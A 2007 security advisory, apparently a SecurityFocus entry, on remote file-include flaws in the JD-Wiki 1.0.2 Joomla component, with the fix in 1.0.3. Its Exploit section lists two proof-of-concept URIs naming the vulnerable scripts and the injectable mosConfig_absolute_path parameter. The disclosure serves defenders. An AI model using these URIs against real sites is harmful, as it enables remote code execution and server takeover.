JD Wiki For Joomla Multiple Remote File Include Vulnerabilities
TITLE: JD Wiki For Joomla Multiple Remote File Include Vulnerabilities
CLASS: Input Validation Error
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Jun 06 2007 12:00AM
UPDATE: Jun 08 2007 08:10PM
CREDIT: DarkbiteX is credited with the discovery of these vulnerabilities.
VULNERABLE:
Joomla JD-Wiki 1.0.2NOT VULNERABLE:
Joomla JD-Wiki 1.0.3
Vai alla pagina originale su Security Focus
Discussion
JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
JD-Wiki 1.0.2 and earlier versions are vulnerable to this issue; other versions may also be affected.
Exploit
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=
http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=
Solution
Solution:
The vendor has released JD-Wiki 1.0.3 to address these issues; please contact the vendor for details on obtaining fixes and upgrades. See the references for details.
References
References:
- JD-Wiki Home Page (Joomla Developing)
- Joomla! Help Site - JD-Wiki (Joomla!)